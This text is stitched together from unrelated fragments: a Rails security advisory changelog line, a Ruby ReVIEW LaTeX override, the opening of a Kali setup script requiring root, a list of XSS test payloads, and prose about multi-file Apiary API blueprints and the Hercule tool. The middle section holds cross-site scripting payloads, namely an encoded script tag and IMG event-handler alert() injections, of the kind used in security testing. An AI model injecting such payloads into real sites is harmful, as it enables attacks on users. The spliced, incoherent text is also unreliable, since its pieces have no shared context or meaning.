- The advisory was updated to classify this as Remote Code Execution.
- https://groups.google.com/d/msg/rubyonrails-security/zRNVOUhKHrg/GmmcVXcmAAAJ
- Thanks to @sorah @tenderlove
module ReVIEW
  module LATEXBuilderOverride
    # Replace ASCII apostrophes in inline tt output with \textquotesingle.
    def inline_tt(s)
      super(s).gsub("'", '\textquotesingle ').sub(/(textquotesingle) }$/, '\1}')
    end
    # Same replacement for inline code output.
    def inline_code(s)
      super(s).gsub("'", '\textquotesingle ').sub(/(textquotesingle) }$/, '\1}')
    end
  end
end
#!/bin/bash
# Well, the entire Kali installation assumes that we are normally working as root on our Kali.
# I know that assumption sucks to its root, but I wanted to avoid every "permission denied" issue and I was too lazy
# to get it done properly as a non-root.
if [ "$EUID" -ne 0 ]; then
    echo "This script must be run as root."
    exit 1
fi
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
This document describes 4 different solutions for working with APIs that consist of multiple blueprint files. Each of these solutions works with all Apiary.io features except editing. To edit a blueprint you have to do it outside of Apiary, as the Apiary editor does not support working with multiple files. In other words, if you are using one of the solutions below, avoid editing the blueprint in Apiary.
Hercule is a CLI tool written in Node.js, available as an NPM package. It uses Markdown referencing and linking syntax to transclude other files into a blueprint file. This solution is universal and would work with any Markdown files, not just API Blueprint.
The major benefit, unlike any other solution here, is also that the references are rendered as HTML links in any Markdown editor, so the result is HTML that can be browsed!